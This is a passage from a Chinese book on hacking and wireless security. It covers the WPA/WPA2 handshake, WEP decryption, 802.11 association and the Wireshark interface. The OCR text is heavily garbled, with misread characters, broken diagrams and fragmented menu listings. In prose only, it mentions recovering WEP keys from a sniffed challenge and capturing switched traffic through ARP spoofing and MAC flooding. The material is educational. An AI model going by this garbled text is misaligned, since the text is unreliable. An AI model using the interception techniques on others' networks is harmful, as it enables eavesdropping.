WEP) 算法 ，TKIP 由 RC4+Michael 完 整 性 
校 验 所 组 成 。 

WPA2 则 是 依据 802.11 全 新 设计 来 实现 
的 ， 它 使 用 CCMP 替 代 了 TKIP， 使 用 AES 
加 密 算法 蔡 代 了 RC4 算 法 ， 由 于 是 全 新 设计 
的 ， 因 此 不 向 下 兼容 WEP 设 备 。 

WPA 在 数据 通信 中 会 有 三 个 过 程 : 

1. 协商 安全 协议 

协商 认证 方式 中 STA 会 通过 探测 帧 获取 
到 AP 中 的 网 络 信息 ， 其 中 包括 速率 、 加 密 
方式 、 信 道 以 及 网 络 名 称 ， 同 样 会 协商 通 


信和 模式 采用 单 播 、 组 播 还 是 广播 ， 加 密 套 
件 使 用 TKIP 还 是 CCMP。 


2. 密 钥 分 发 和 验证 


无 线 网 络 设 计 用 于 一 组 无 线 设备 通信 ， 
关联 到 同一 设备 共享 无 线 信 道 ， 根 据 通 信安 
全 特性 不 同 ， 分 为 单 播 、 组 播 和 广播 。 

单 播 通信 是 AP 与 STA 之 间 的 一 个 私密 
通信 ， 因 此 它们 会 保存 彼此 的 一 个 私 钥 PTK 
(Pairwise Key) 也 被 称 为 点 到 点 密 钥 ， 这 个 
密 钥 是 临时 性 的 ， 一 旦 到 期 需要 重新 计算 。 

组 播 通信 是 AP 与 域内 所 有 成 员 共享 的 
同一 密 钥 GTK (Group Key) 组 密 钥 ， 这 个 
密 钥 在 域内 的 所 有 成 员 都 知道 ， 用 于 AP 发 
送 组 播 使 用 。 

广播 通信 一 般 是 不 加 密 的 ， 主 要 用 于 
AP 向 整个 区 域 宣告 存在 ， 任 何 本 区 域 的 设 
备 都 可 以 获取 到 广播 信息 。 


3. 数据 加 密 完整 性 校 验 

PMK (Pairwise Master Key) 是 一 串 
256 位 即 32 字 节 的 密 铀 ，PMK 的 计算 公式 ， 
ESSID+PSK+ 迭 代 次 数 4096 次 再 通过 Hash 计 
算 生 成 ， 其 中 PSK 是 无 线 密码 ，PMK 是 由 
STA 与 AP 分 别 计 算得 出 ，PMK 并 不 在 网 络 
中 进行 交换 。 


PTK (Pairwise Transient Key) 生成 算 
法 有 两 种 ， HMAC-SHA1 散 列 算法 和 PRF-X 
散 列 算法 。 

PTK 的 计算 过 程 : PTK 是 通过 STA 与 AP 
的 四 步 握手 信息 计算 出 来 的 ， 计 算 公式 是 
PMK+Noncel+Nonce2+AP MAC+STA MAC 
计算 生成 ， 它 是 一 串 256 位 的 哈 希 值 ， 如 下 
图 所 示 。 


STA : :AP 
Anonce : 


Snonce+MIC 


GTK+MIC 


ACK 


计算 PTK 的 步骤 如 下 : 
[sep 加 AP 向 STA 发 送 一 个 Noncel， 这 个 
Noncel 是 由 AP 随 机 生成 的 ， 由 于 是 AP 随 机 
生成 的 ， 因 此 把 它 简 记 为 Anonce。 
[step 图 STA 拿 到 Noncel 后 随机 生成 Nonce2， 
这 时 需要 计算 PTK 的 所 有 信息 都 以 具备 ， 此 


时 STA 可 以 计算 出 PTK。 
step 国 STA 将 Nonce2 发 送 给 AP， 由 于 
Nonce2 是 由 STA 随 机 生成 ， 因 此 把 它 简 记 


为 Snonce。 它 是 以 明文 发 送 的 ， 同 时 STA 会 
通过 哈 希 算法 ， 计 算出 PTK 的 MIC 校 验 码 并 
一 同 发 送 给 AP， 这 个 MIC 码 是 不 可 逆 的 。 
(从 注意 : 如 果 Snonce 在 发 送 过 程 中 被 自 
改 ， 此 时 AP 计算 的 PTK 将 改变 ，MIC 同 样 
无 法 匹配 ，AP 将 会 中 断 连 接 ， 这 样 的 通信 
还 是 非常 安全 的 。 


Estee 加 此 时 AP 也 拥有 了 计算 PTK 的 所 有 数 
据 ， 通 过 相同 的 哈 希 算法 计算 出 PTK 的 MIC 
校 验 码 ， 再 与 STA 发 送 的 MIC 校 验 码 进行 比 
较 ， 如 果 MIC 相 同 ， 证 明 STA 是 知道 PMK 的 。 
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[se 图 AP 将 GTK+MIC 发 送 给 STA， 此 时 
STA 便 拥有 了 PTK 与 GTK。 

[see 图 STA 回 复 一 个 ACK 数 据 包 ， 用 于 告知 
AP 已 经 准备 好 PTK， 后 续 数 据 包 可 以 使 用 
PTK 进 行 加 密 数 据 。 


6.5 ”实战 演练 


实战 演练 1 一 一 WEP 的 解密 步骤 


熟悉 WEP 的 加 密 原理 后 ， 再 来 了 解 一 
下 WEP 的 解密 原理 ，WEP 的 解密 还 是 比较 
简单 的 ， 它 是 加 密 过 程 的 一 个 逆序 过 程 。 

WEP 解 密 过 程 可 以 通过 下 图 来 描述 。 


了 wm 于 ev 


SA | [Pres |— ee 


前 密 后 数据 


| 合并 数据 


cncaz 
| 原始 中 广 数据 一 | cv | biacv 


解密 过 程 可 以 通过 以 下 几 个 步骤 完成 : 
[step 回 通过 数据 包 中 的 IV 与 无 线 密码 生成 
KSA。 
[step 贺 通过 KSA 结 合 Key ID 生成 本 次 加 密 数 
据 的 密 钥 流 。 
[step 图 通过 密 钥 流 与 加 密 数 据 异 或 ， 得 到 本 
次 解密 数据 。 
[step 贺 如 果 存 在 数据 包 切 片 ， 将 解密 后 的 数 
据 包 组 装 成 原始 数据 。 
[step 图 通过 CRC32 算 法 生成 组 装 后 数据 包 的 
ICV。 


step 国 对 生成 的 ICV 数 据 进 行 校 验 。 
实战 演练 2 一 一 无 线 通信 的 过 程 

要 想 将 计算 机 或 手机 等 终端 设备 连接 
到 无 线 网 络 ， 必 须 经 过 3 个 过 程 ， 分 别 是 扫 
描 (SCAN) 、 认 证 (Authentication ) 与 
关联 (Association) 。 经 历 这 些 过 程 后 STA 
才能 与 AP 建 立 关 联 ， 并 开始 通信 ， 下 图 为 
STA 与 AP 建 立 关联 的 示意 图 。 


101 


黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 ( 超 值 版 ) 


STA ap 
Discovery 选 择 AP 
(采用 侦 听 Beacon 帧 或 发 送 Probe 帧 ) 


authentication 


一 
Association 


+ 


同 建立 kssociation 关 联 的 Ap 通信 
一 一 到 


1. 扫描 (SCAN) 


扫描 过 程 分 为 如 下 两 种 情况 : 

(1) 车 无线 站 点 STA 设 成 Ad-hoc (无 
AP) 模式 。 

STA 先 寻找 是 否 已 有 IBSS (与 STA 
所 属相 同 的 SSID ) 存在 ， 如 有 ， 则 参加 
(join) ;， 若 无 ， 则 会 自己 创建 一 个 IBSS， 
等 其 他 工作 站 连接 。 

(2) 若 无 线 站 点 STA 设 成 Infrastructure 
(有 AP) 模式 ， 可 以 分 为 如 下 两 种 情况 。 

e 主动 扫描 方式 (特点 : 能 迅速 找 

到 ) ， 依 次 在 每 个 信道 上 发 送 Probe 
Tequest 数 据 帧 ， 从 Probe Response 中 
获取 BSS 的 基本 信息 ，Probe Response 
包含 的 信息 和 Beacon 帧 类 似 。 

e 被 动 扫描 方式 (特点 : 找到 时 间 较 

长 ， 但 STA 节 电 ) 。 

通过 侦 听 AP 定期 发 送 的 Beacon 帧 来 发 
现 网 络 ，Beacon 帧 中 包含 该 AP 所 属 的 BSS 
的 基本 信息 以 及 AP 的 基本 能 力 级 ， 包 括 : 
BSSID (AP 的 MAC 地 址 ) 、SSID、 支 持 的 
速率 、 支 持 的 认证 方式 ， 加 密 算法 、Bea- 
cons 帧 发 送 间隔 ， 使 用 的 信道 等 。 

当 未 发 现 包含 期 望 的 SSID 的 BSS 时 ， 
STA 可 以 工作 于 IBSS 状 态 ， 扫 描 阶 段 的 STA 
不 断 的 请 求 ， 通 过 AP 返回 的 帧 判断 AP 存 
在 ， 下 图 为 实现 扫描 示意 图 。 
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STA aP 


Probe Request 


Probe Response 


Probe Request 


Probe Response 


-< 一 一 一 


2. 认证 

802.11 支 持 两 种 基本 的 认证 方式 : 

第 一 种 : Open-system Authentication 
(开放 型 )， 即 开放 型 连接 ， 下 图 为 连接 
示意 图 。 

(1) 等 同 于 不 需要 认证 ， 没 有 任何 安 
全 防护 能 力 。 

(2) 通过 其 他 方式 来 保证 用 户 接 入 网 
络 的 安全 性 ， 例 如 Address filter、 用 户 报 文 
中 的 SSID。 


STA 


Authentication Request 


Authentication Response 
(success) 


第 二 种 : Shared 一 Key Authentication 
(共享 密 钥 ) ， 即 共享 Key 连 接 ， 下 图 为 共 

享 Key 连 接 示意 图 。 

(1) 采用 WEP 加 密 算法 。 

(2) Attacker 可 以 通过 监听 AP 发 送 
的 明文 Challenge text 和 STA 回复 的 密 文 
Challenge text 计算 出 WEPKEY。 

另外 ，STA 可 以 通过 Deauthentication 来 
终结 认证 关系 。 


STA 2P 


Authentication Request 


Plain text challenge 


预 置 Key 


用 key 
加 密 明 文 


Cipher text challenge 


Authentication Response 
(success) 


3. 关联 (Association) 


(1) Association。STA 通过 Association 
和 一 个 AP 建立 关联 ， 后 续 的 数据 报 文 的 收 
发 只 能 和 建立 Association 关系 的 AP 进行 。 

(2) Reassociation。STA 在 从 一 个 老 的 
AP 移动 到 新 AP 时 ， 通 过 Reassociation 和 
新 AP 建立 关联 。Reassociation 前 必须 经 历 
Authentication 过 程 。 

(3) Deassociation。STA 通 过 Deasso- 
ciation 和 AP 解除 关联 关系 ， 整 体 的 过 程 可 
以 总 结 成 以 下 三 个 步 又: 

Probe 过 程 ， 首 先 STA 向 所 有 信道 发 出 
Probe 帧 ， 发 现 AP， 其 次 AP 应 答 Response。 

Authentication 过 程 ， 首 先 STA 向 AP 发 
出 验证 请 求 ， 然 后 进行 认证 过 程 ( 这 个 过 
程 可 能 会 存在 多 个 数据 交互 )， 其 次 AP 响 
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应 STA 的 认证 结果 。 
[step 图 Association 过 程 ， 首 先 STA 发 出 关联 
请 求 ， 其 次 AP 响应 关联 请 求 。 

通过 以 上 三 个 步骤 后 如 果 认证 成 功 ， 
便 可 以 开始 通信 。 下 图 为 其 中 的 通信 流程 。 


STA 


ProbeRequest AP 
一 


第 一 步 
ProbeResponse 


R 
AuthenticationRequest 
一 


1 Authentication Process |! 
第 - 步 | > ! 


AuthenticationResponse 
二 
AssociationRequest 


第 三 步 
AssociationResponse 


6.6 “小 试 身 手 

认识 无 线 数据 帧 的 结构 。 

了 解 控制 帧 的 作用 与 工作 原理 。 
了 解 管理 帧 的 作用 与 工作 原理 。 
了 解数 据 帧 的 作用 与 工作 原理 。 
掌握 无 线 通信 的 加 密 原 理 。 


练习 1: 
练习 2: 
练习 3: 
练习 4: 
练习 5: 
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第 7 草 ”无 线 网 络 的 安全 分 析 工 具 


Wireshark 〈 前 称 Ethereal) 是 一 个 网 络 封包 分 析 软 件 ， 主 要 功能 是 捕获 网 络 封包 ， 
并 尽 可 能 显示 出 最 为 详细 的 网 络 封包 信息 ， 网 络 管理 员 使 用 Wireshark 可 以 检测 当前 网 络 


问题 。 


om7.1 认识 Wireshark 


Wireshark 不 是 入 侵 检 测 工具 ， 对 于 网 
络 上 的 异常 流量 行为 ， 不 会 产生 警示 或 是 任 
何 提示 ， 用 户 只 有 仔细 分 析 Wireshark 捕 获 的 
封包 ， 才 能 了 解 当前 网 络 的 运行 情况 。 


功能 介绍 


如 Wireshark 是 使 用 比较 广泛 的 网 络 抓 包 

软件 ， 主 要 是 因为 其 开源 免费 ， 通 过 修改 源 
码 还 可 以 添加 个 性 的 功能 。 使 用 的 人 群 主 要 
有 网 络 管理 员 、 网 络 工 程 师 、 安 全 工程 师 、 
IT 运 维 工 程 师 以 及 网 络 爱好 者 。 

在 实际 应 用 中 ， 使 用 Wireshark 可 以 进 
行 网 络 底层 分 析 、 解 决 网 络 故障 问题 、 发 现 
潜在 网 络 安全 问题 等 。 下 面 进 行 详细 介绍 : 

(1) 网 络 底层 分 析 。 通 过 Wireshark 可 
以 捕获 底层 网 络 通信 ， 对 于 初学 者 而 言 可 
以 更 加 直观 地 去 了 解 网 络 通信 中 每 一 层 数 
据 处 理 的 过 程 ， 如 果 想 要 成 为 一 个 网 络 工 
程 师 ， 了 解 和 熟悉 网 络 中 每 一 层 通信 过 程 
是 非常 有 必要 的 。 

(2) 解决 网 络 故障 问题 。 由 于 网 络 的 
特殊 性 ， 所 以 引起 网 络 故障 的 方式 也 是 多 
样 的 ， 通 过 Wireshark 可 以 很 好 地 检查 网 络 
通信 的 各 个 环节 ， 精 确定 位 到 具体 发 生 故 
障 的 节点 以 及 可 能 发 生 故 障 的 区 域 。 

(3) 发 现 潜在 网 络 安全 问题 。 通 过 
Wireshark 对 网 络 数据 包 分 析 ， 可 以 发 现 
网 络 中 潜在 安全 问题 ， 例 如 : ARP 欺骗 、 
DDOS 网 络 攻击 等 。 


a 7.1.1 


7.1.2 ” 抓 包 原理 


Wireshark 是 一 个 跨 平 台 抓 包 软 件 ， 可 
以 很 好 地 工作 在 Windows 系 统 、MacOS 系 
统 、Linux 以 及 Unix 系 统 平 台 ， 也 正 是 这 样 
的 跨 平台 所 以 受到 使 用 者 的 追捧 。 

Wireshark 为 什么 可 以 抓 到 网 络 包 ， 可 
以 从 网 络 原 理 与 底层 原理 两 方面 来 分 析 。 


1. 网 络 原理 


网 络 原 理 是 在 何 种 网 络 环境 下 进行 
抓 包 ， 这 是 抓 包 的 前 所， 其 中 分 为 三 种 情 
况 ， 即 本 机 环境 、 集 线 器 环境 、 交 换 机 
环境 。 

(1) 本 机 环境 。 本 机 环境 主要 针对 流 经 
本 机 网 卡 的 数据 包 。 下 图 为 抓 包 示意 图 。 


计算 机 


SS 


通信 流量 二 让 


Wireshark 


(2) 集线器 环境 。 这 种 情况 在 网 络 中 
有 多 台 主 机 ， 多 台 主 机 通过 集线器 进行 网 
络 通信 ， 集 线 器 属于 物理 层 设备 ， 从 某 一 
个 接口 接收 的 数据 包 ， 会 被 集线器 从 其 他 
所 有 接口 转发 出 去 。 利 用 集线器 的 这 个 原 
理 ， 通 过 PC1 进行 抓 包 便 可 以 抓 取 整个 局 
域 网 的 数据 。 下 图 为 抓 包 示意 图 。 
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(3) 交换 机 环境 。 集 线 器 的 最 大 缺点 在 于 使 用 集线器 的 整个 局 域 网 属于 一 个 “冲突 域 ”， 
而 且 随 着 终端 数量 的 增加 ， 冲 突 的 频率 也 越 来 越 高 ， 通 信 质 量 严重 下 降 ， 而 交换 机 每 一 个 
接口 属于 一 个 单独 的 “冲突 域 ”， 整 个 局 域 网 被 分 割 为 很 多 小 的 “冲突 域 ”， 通 信 质 量 大 
大 提高 。 

交换 机 环境 实现 抓 包 可 以 分 为 三 种 形式 ， 分 别 是 端口 镜像 、ARP 欺 骗 和 MAC 泛 洪 。 

(1) 端口 镜像 。 在 交换 机 网 络 中 将 所 有 通过 交换 机 中 转 的 数据 包 ， 全 部 都 复制 一 份 流 
经 一 个 端口 ， 这 个 就 是 端口 镜像 ， 如 下 图 所 示 。 


(2) ARP 欺骗 。 在 交换 机 中 保存 了 一 份 MAC 地 址 表 ， 其 中 包含 局 域 网 中 各 个 主机 
MAC 地 址 ， 通 过 PC1 发 送 ARP 地 址 欺骗 可 以 将 局 域 网 中 所 有 MAC 地 址 都 改写 为 PC1 的 
地 址 ， 此 时 所 有 数据 都 将 流 经 PC1， 再 由 PC1 进行 转发 由 此 实现 抓 包 ， 如 下 图 所 示 。 


@ 下 


@ 
gp 加 和 (出 ) ; 我 py ， 对 EM3c1 。。 ARP 靖 灾 (广播 : 诊 是 TPs 和 后 MLAC 地 址 告知 我 PC 
PC1 @ 
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(3) MAC 泛 洪 : 通过 PC1 发 送 大 量 MAC 地 址 信息 的 垃圾 数据 包 ， 导 致 交 换 机 MAC 
地 址 表 爆 表 ， 当 交换 机 没有 MAC 地 址 表 时 ， 流 经 交换 机 的 所 有 数据 都 会 以 广播 的 形式 发 


送 ， 如 下 图 所 示 。 


[ 团 产 一 | 车 | 
@ @ 


泛 洪 垃圾 包 , 产生 大 量 MAC 地 址 
一 一 一 一 一 一 一 一 


Wireshark 


2. 底层 原理 


Wireshark 抓 包 的 底层 原理 ， 如 下 图 
所 示 。 


wireshark 


Capture Wiretap 
| 
— Miesp _ 
Capture-Filters | Remi 


Wireshark 抓 包 底 层 原理 示意 图 中 的 主 
要 内 容 介绍 如 下 : 

(1) Win/libcap。 这 是 Wireshark 抓 包 
时 所 依赖 的 库 文件 ， 也 是 Wireshark 最 核心 
最 底层 的 支持 库 。 

(2) Capture。 捕 包 引 擎 ， 利 用 Win/lib- 
pcap 从 底层 抓 取 网 络 数据 包 ，Win/libpcap 
提供 了 通用 的 抓 包 接口 ， 能 从 不 同类 型 的 
网 络 接口 (包括 以 太 网 、 令 牌 环 网 、ATM 
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网 等 ) 获取 网 络 数 据 。 

(3) Wiretap。 格 式 支持 ， 从 抓 包 文件 
中 读 取 数据 包 ， 支 持 多 种 文件 格式 。 

(4) Core。 核 心 引 擎 ， 通 过 函数 调用 将 
其 他 模块 连接 在 一 起 ， 起 到 联动 调度 的 作 
用 ， 其 中 还 包括 一 个 Epan 〈 包 分 析 引 擎 ) ， 
该 Epan 可 以 将 各 种 获取 的 数据 包 进 行 分 类 
解析 。 

(5) Protocol-Tree。 保 存 数 据 包 的 协议 
信息 , Wireshark 的 协议 结构 采用 树 形 结构 ， 
解析 协议 报 文 时 只 须 从 根 节点 通过 函数 句 
柄 依次 调用 各 层 解析 函数 即 可 。 

(6) Dissectors 。 在 Epan/disserctor 目录 
下 ， 各 种 协议 解码 器 ， 支 持 700 多 种 协议 解 
析 ， 对 于 每 种 协议 ， 解 码 器 都 能 识别 出 协议 
字段 (field) ， 并 显示 出 字段 值 (field val- 
ue) ， 由 于 网 络 协 议 种 类 很 多 ， 为 了 使 协议 
和 协议 间 层 次 关系 明显 ， 对 数据 流 里 的 各 
个 层次 的 协议 能 够 逐 层 处 理 ，Wireshark 系 
统 采用 了 协议 树 的 方式 。 

(7) Plugins。 一 些 协议 解码 器 以 插件 
的 形式 实现 ， 源 码 在 plugins 目录 。 


(8) Display-Filters。 显示 过 滤 引 擎 ， 
源码 在 epan/dfilter 目录 。 

(9) GTK1/2。 图 像 处 理工 具 ， 处 理 用 
户 的 输入 输出 信息 。 


7.1.3 ”基本 界面 


使 用 Wireshark 抓 包 软 件 先 要 从 它 的 界 
面 入 手 ， 其 主 界面 包括 工具 栏 、 快 捷 菜单 、 
筛选 过 滤 、 功 能 显示 窗口 以 及 任务 栏 等 。 

打开 Wireshark 抓 包工 具 ， 单 击 “ 应 
用 程序 ”下 拉 菜 单 ， 从 中 选择 “09- 嗅 探 / 
欺骗 ”菜单 项 ， 在 弹出 的 菜单 中 可 以 看 到 
Wireshark 图 标 ， 如 下 图 所 示 。 


应 用 程序 ~ 


抓 包 软 件 。 下 图 为 其 工作 界面 。 


Weiswk 风量 4 条 明了 的 栏 
TT 仙人 二 0 天 ty 工商 0 人 
Pe ee ied 国 至 A 


oe0 


7 
jaa > 


如 果 已 经 进行 了 抓 包 操作 ， 当 打开 一 
个 数据 包 后 ， 其 工作 界面 如 下 图 所 示 。 
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[Er 打开 的 广 作 人 电 eee 
NE SRE) AE PRG) WO FA i ee TD) mes 
Pr 
O 数据 包 宣 品 


Tt 
| 一 ”aeRtt 字 险 


分 组 信息 里 示 


Fr TEN ponie pe 


下 面 重点 介绍 Wireshark 工 作 界 面 中 常 
用 菜单 : 

(1) 文件 菜单 。 文 件 菜单 主要 负责 打 
开 已 经 抓 取 的 数据 包 、 最 近 打 开 的 数据 包 
合并 数据 包 、 导 入 导出 特定 数据 包 。 这 个 
在 后 面 还 会 重点 讲解 ， 这 里 只 对 界面 做 简 
单 了 解 。 下 图 为 文件 菜单 结构 。 


打开 Ctrl+O 

打开 最 近 » 
合并 (M)… 

从 Hex 转 储 导入 (])... 
关闭 


Ctrl+W 


另存 为 (A).. Ctrl+Shift+S 
文件 集合 » 
导出 特定 分 组 .… 

导出 分 组 解析 结果 » 


导出 PDU 到 文件 … 

导出 SSL 会 话 密 钥 .… 

导出 对 象 » 

打印 (p)-。 ctrttp 

退出 Ctrl+Q 

(2) 编辑 菜单 。 编 辑 菜单 主要 负责 对 
数据 包 分 类 标记 ， 以 及 在 抓 包 过 程 中 按照 
时 间 大 小 进行 分 包 存 储 ， 还 有 整个 软件 的 
首选 项 也 在 编辑 菜单 中 ， 如 下 图 所 示 。 
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复制 

QQ 查找 分 组 FJ- 
查 技 下 一 个 IJ) 
查找 上 一 个 邮 
标记 /取消 标记 分 组 [MI) 
标记 所 有 显示 的 分 组 


忽略 /取消 忽略 分 组 山 


设置 /取消 设置 时 间 参考 


时 间 平移 -- 
分 组 注释 
Delete All Packet Comments 
配置 文件 
首选 项 (P| 


CultF 
CettN 
Ctrl+B 
CtrttM 
CertrshiftrM 


Ctrl+D 


CerttT 


Ctrl+Shift+T 
CutrAtrC 


Ctrl+Shift+A 
Cul+Shift+p 


(3) 捕获 菜单 。 捕 获 菜单 用 于 设置 捕 


获 规则 ， 其 中 选项 菜单 可 以 设置 捕获 的 网 
卡 ， 还 可 以 设置 捕获 规则 ， 如 下 图 所 示 。 
图 选项 (DO).. CtrltK 
大 开始 (S) Ctrl+E 

四 
刷新 接口 列表 F5 


(4) 分 析 菜 单 。 分 析 菜 单 针对 已 经 获 
取 的 数据 包 进 行 分 析 ， 通 过 制定 相应 的 规 
则 得分 数据 包 ， 如 下 图 所 示 。 


显示 过 滤器 .- 
显示 过 滤器 宏 (M).… 


作为 过 滤器 应 用 
准备 过 滤器 
对 话 过 滤器 
启用 的 协议 .… 
解码 为 (A).… 

重新 载 入 Lua 插件 
SCTP 

追踪 流 


专家 信息 


Ctrl+Shift+E 


Ctrl+Shift+L 


(5) 视图 菜单 。 视 图 菜单 主要 是 针对 
软件 中 的 视图 显示 进行 设置 ， 重 点 需要 关 
注 的 是 解析 名 称 、 列 显示 中 的 着 色 规则 


如 下 图 所 示 。 
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V 主 T 具 栏 (M) 
要 过 滤器 工具 栏 (D) 
无 线 工具 栏 上 
六 状态 栏 S) 
全 屏 {E) F11 
分 组 列表 (L) 
六 分 组 详 清 (D) 
VV 分 组 字 节 流 (B) 
时 间 显示 格式 四 
解析 名 称 
缩放 (Z) ， 


展开 全 部 (E) 
收 起 全 部 (A) 
于 着 色 分 组 列表 
着 色 规则 (C). 
对 话 着 色 
重 置 布 司 Ctrl+Shift+W 
要 调整 列 宽 Ctrl+Shift+R 
内 部 "| 
在 新 留 口 显示 分 组 W) 
重新 载 入 为 文件 格式 /捕获 
网 重新 加 载 (R) 


(6) 统计 菜单 。 统 计 菜单 可 以 通过 对 
己 有 数据 进行 图 形 化 数据 分 析 ， 这 个 功能 
对 于 分 析 大 量 数据 是 非常 有 帮助 的 ， 如 下 
图 所 示 。 


捕获 文件 属性 
已 解析 的 地 址 
协议 分 级 (P) 
对 话 

端点 

分 组 长 度 

lo 图 表 (!) 
服务 响应 时 间 » 
DHCP (BOOTP) Statistics 

ONC-RPC programs 

29West » 
ANCP 

BACnet » 
Collectd 

DNS 


Ctrt+Right 
CtrltLeft 


Ctrl+Shift+F 
Ctrl+R 


Ctrl+Alt+Shift+C 


流量 图 

HART-IP 

HPFEEDS 

HTTP » 
HTTP2 

Sametime 

TCP 流 图 形 村 
UDP 多 播 流 

F5 » 
IPv4 Statistics » 
IPv6 Statistics » 


7.2 ”开始 抓 包 


通过 前 面 的 学 习 ， 相 信 读 者 对 Wireshark 
有 了 一 个 基本 的 了 解 ， 下 面 针 对 如 何 抓 取 数 
据 以 及 如 何 对 数据 过 滤 进 行 讲解 。 


7.2.1 快速 配置 


Wireshark 的 特点 是 简单 易 用 ， 通 过 简 
单 的 设置 便 可 以 开始 抓 包 ， 甚 至 只 须 选 择 
一 个 网 卡 后 ， 单 击 “ 开 始 ” 按 钮 ， 便 可 以 
实现 快速 抓 包 。 


1. 抓 包 操 作 


具体 操作 步 又 如 下 : 
打开 Wireshark 抓 包工 具 ， 在 界面 “ 捕 
获 ” 功 能 选项 中 ， 可 以 对 捕获 数据 包 进 行 
快速 配置 ， 如 果 网 卡 中 产生 数据 ， 会 在 网 
卡 的 右 侧 显示 折线 图 ， 如 下 图 所 示 。 

捕获 

-- 便 用 这 个 过 滤器 : [出 |Entera capture filter 


wlan0mon PMA 
any NA 
Loopback lo 

wlanO 一 -一 
nflog 


双击 选中 的 网 卡 ， 便 可 以 开始 抓 包 ， 
此 时 “开始 ”按钮 变 成 灰色 ，“ 停 止 ” 按 
钮 与 “ 重 置 ”按钮 可 选 。 下 图 为 Wireshark 
工具 抓 取 的 数据 信息 。 


侈 提示 : 抓 包 一 旦 开始 ， 默 认 数 据 包 显 
示 列 表 会 动态 刷新 最 新 捕获 的 数据 。 单 击 
“停止 ”按钮 可 以 停止 对 数据 包 的 捕获 ， 
此 时 状态 栏 会 显示 当前 捕获 的 数据 包 数 量 
及 大 小 。 
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2. 数据 包 显示 列 


默认 情况 下 ，Wireshark 会 给 出 一 个 初 
始 数据 包 显 示 列 ， 如 下 图 所 示 。 


主要 内 容 介绍 如 下 : 

(1) No。 编 号 ， 根 据 抓 取 的 数据 包 自 入 
动 分 配 。 

(2) Time。 时 间 ， 根 据 捕获 时 间 设 定 
该 列 。 

(3) Source: 源 地 址 信息 ， 如 果 数 据 包 
包含 源 地 址 信息 ， 例 如 全、MAC 等 ， 这 类 
信息 会 显示 在 这 列 当中 。 

(4) Destination。 目 的 地 址 信息 ， 同 源 
地 址 类 似 。 

(5) Protocol。 协 议 信 息 ， 捕 获 的 数据 
包 会 根据 不 同 的 协议 进行 标注 ， 这 列 显示 
具体 协议 类 型 。 

(6) Length。 长 度 信息 ， 标 注 出 该 数据 
包 的 长 度 信息 。 

(7) Inof。 信 息 ，Wireshark 对 数据 包 
的 一 个 解读 。 


3. 修改 显示 列 


默认 的 显示 列 可 以 修改 ， 在 实际 数据 
分 析 当 中 ， 根 据 需要 可 以 修改 显示 列 的 项 
目 ， 具 体操 作 步 骤 如 下 : 
[Ep 加 选中 需要 加 入 显示 列 的 子 项 ， 右 击 ， 
在 弹出 的 快捷 菜单 中 选择 “应 用 为 列 ” 菜 
单 命令 ， 如 下 图 所 示 。 


文件 E， 编辑 IE) 视图 (Y) 继 苇 (G) 捕获 (C) } 
一 展开 全 部 (E) 
有 妈 Q 1 
帮 画 忆 @@ 站 四 驴 加 收 起 全 部 (4) 
Oo 加 」 。 应 用 为 列 
Soeur 作为 过 滤器 应 用 


121 04:12: 41.686209667 42:3 
122 04:12:41.699536268 Sher| 。 准备 这 淖 器 


123 64:12:41.786773892 Huaw 
124 84:12:41.788821624 Huay 
125 64:12:41.711347375 

26 64:12:41.714919849 


对 话 过 滤器 

用 过 滤器 着 色 

追踪 流 

复制 

(6 。 显示 分 组 字 节 -。 

导出 分 组 字 节 注 [B)- 
加 。 wiki 协议 页 面 

过 滤器 宇 段 参考 
协议 首选 项 


.986 6666 0000 9969 = Duration 
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常 有 帮助 ， 如 下 图 所 示 。 


在 弹出 的 菜单 中 可 以 通过 选择 相应 的 菜单 命令 ， 


列 ， 如 右 图 所 示 。 


“编辑 列 ” 菜 单 命令 ， 


7 Destination Protocol 


4. 修改 显示 时 间 


默认 情况 下 ，Wireshark 给 出 的 时 间 信 
息 不 方便 阅读 ， 为 此 ，Wireshark 提 供 了 多 
种 时 间 显 示 方 式 ， 用 户 可 以 根据 个 人 喜好 
进行 选择 。 具 体操 作 步 又 如 下 : 
[step 图 单 去 “视图 ”菜单 ， 在 弹出 的 菜单 中 
选择 “时 间 显 示 格 式 ” 菜 单 命令 ， 如 下 图 
所 示 。 


时 间 显 示 格式 (T) » 
解析 名 称 E 
缩放 (Z) 


step 较 这 样 就 可 以 将 默认 时 间 信 息 以 时 间 格 
式 显示 出 来 。 下 图 为 修改 后 的 时 间 ， 这 样 
更 加 符合 阅读 习惯 。 


[Time 

|2618-16-19 64:12:41.541339119 
2618-19-19 94:12:41.543990696 
2618-19-16 94:12:41.569918794 
2618-19-16 64:12:41.578931296 


5. 名 字 解 析 


默认 情况 下 ，Wireshark 只 开启 了 MAC 
地 址 解析 ， 针 对 不 同 厂商 的 MAC 头 部 信息 
进行 解析 ， 以 方便 阅读 ， 如 果 在 实际 中 有 
需要 可 以 开启 解析 网 络 名 称 、 解 析 传 输 层 
名 称 。 具 体 的 操作 步骤 如 下 : 
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step 图 此 时 显示 列 中 会 加 入 新 列 ， 这 样 针 对 特殊 协议 分 析 会 非 


step 加 用 户 还 可 以 删除 、 隐 藏 当前 列 ， 在 显示 列 标题 中 右 击 ， 


类 型 ， Time (ormat as specified) -| 字 扎 : |Entera fiel 


编辑 列 
适应 内 容 


v No. 

v Time 

V Source 

V Destination 
V Protocol 
来 删除 或 隐藏 【Lemon 
v Type 
V Info 


”删除 此 列 


Esteep 贺 用 户 可 以 对 当前 列 信息 进行 修改 ， 在 显示 列 标题 中 右 击 ， 在 弹出 的 快捷 菜单 中 选择 
即 可 进入 列 信息 编辑 模式 ， 这 时 可 以 对 当前 列 信息 进行 修改 。 


d 发 生 : Scancel ’ vok 


Length Type hfo 


[sep 国 单 去 “捕获 ”菜单 ， 在 弹出 的 菜单 
列表 中 选择 “选项 ”菜单 命令 ， 如 下 图 
所 示 。 


夯 选项 (0).. Ctrl+K 
着 开始 (S) Ctrl+E 
a 

捕获 过 滤器 (F).… 

刷新 接口 列表 F5 


在 打开 的 设置 界面 中 选择 “选项 ” 选 
项 卡 ， 如 下 图 所 示 。 从 这 里 勾 选 相应 的 选 
项 解析 名 称 即 可 。 


输入 输出 选项 
显示 选项 解析 名 称 
V 实时 更 新 分 组 列表 VY MAC 地 址 解析 
V 实时 捕获 时 自动 浪 屏 解析 网 络 名 称 
解析 传输 层 名 称 


[step 图 用 户 还 可 以 手动 修改 对 地 址 的 解析 ， 
右 击 需 要 解析 的 地 址 段 ， 在 弹出 的 菜单 中 
选择 “编辑 解析 的 名 称 ” 菜 单 命令 ， 如 下 
图 所 示 。 

| “标记 /取消 标记 分 组 M) | 
忽略 /取消 忽略 分 组 ()) 
